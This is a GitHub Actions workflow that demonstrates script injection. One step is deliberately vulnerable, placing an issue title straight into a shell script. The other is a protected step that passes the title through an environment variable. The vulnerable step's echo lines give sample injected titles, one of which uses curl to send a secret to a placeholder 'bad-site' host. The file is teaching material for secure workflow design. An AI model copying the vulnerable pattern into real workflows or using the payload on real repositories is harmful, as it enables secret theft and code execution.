name: Demo on how script injection (threat) can happen
on:
  #  issues:
  #    types:
  #      - opened
  #      - reopened
  workflow_dispatch:
jobs:
  assign-label:
    runs-on: ubuntu-latest
    steps:
      - name: Vulnerable step - executing title as command
        run: |
          echo ---
          echo This is a step vulnerable to script injection
          echo Open/Reopen an issue entitled, e.g.':' 'a";echo !!! I have bugexecuted a script !!!"'
          echo As a result, an echo script will be executed 
          echo "(and btw issue is NOT identified as bug cause it is another command already)" 
          echo Now imagine such a name ':' 'a"; curl http://bad-site/steal-password/$MY_SECRET'
          echo ---
          title="${{github.event.issue.title}}"
          if [[ "$title" == *"bug"* ]]; 
          then
            echo "Issue is a bug"
          else
            echo "Issue is NOT a bug"
          fi
      - name: Protected step - setting title as environment variable first
        env:
          TITLE: ${{github.event.issue.title}}
        run: |
          echo ---
          echo This is a step proteced from script injection
          echo Before using the text, the script sets it as environment variable - treats it as text only
          echo Open/Reopen an issue entitled, e.g.':' 'a";echo !!! I have bugexecuted a script !!!"'
          echo Now the script in the title will not be executed
          echo "(and the issue WILL be identified as bug because the whole string is considered as text)"
          echo ---
          if [[ "$TITLE" == *"bug"* ]]; 
          then
            echo "Issue is a bug"
          else
            echo "Issue is NOT a bug"
          fi
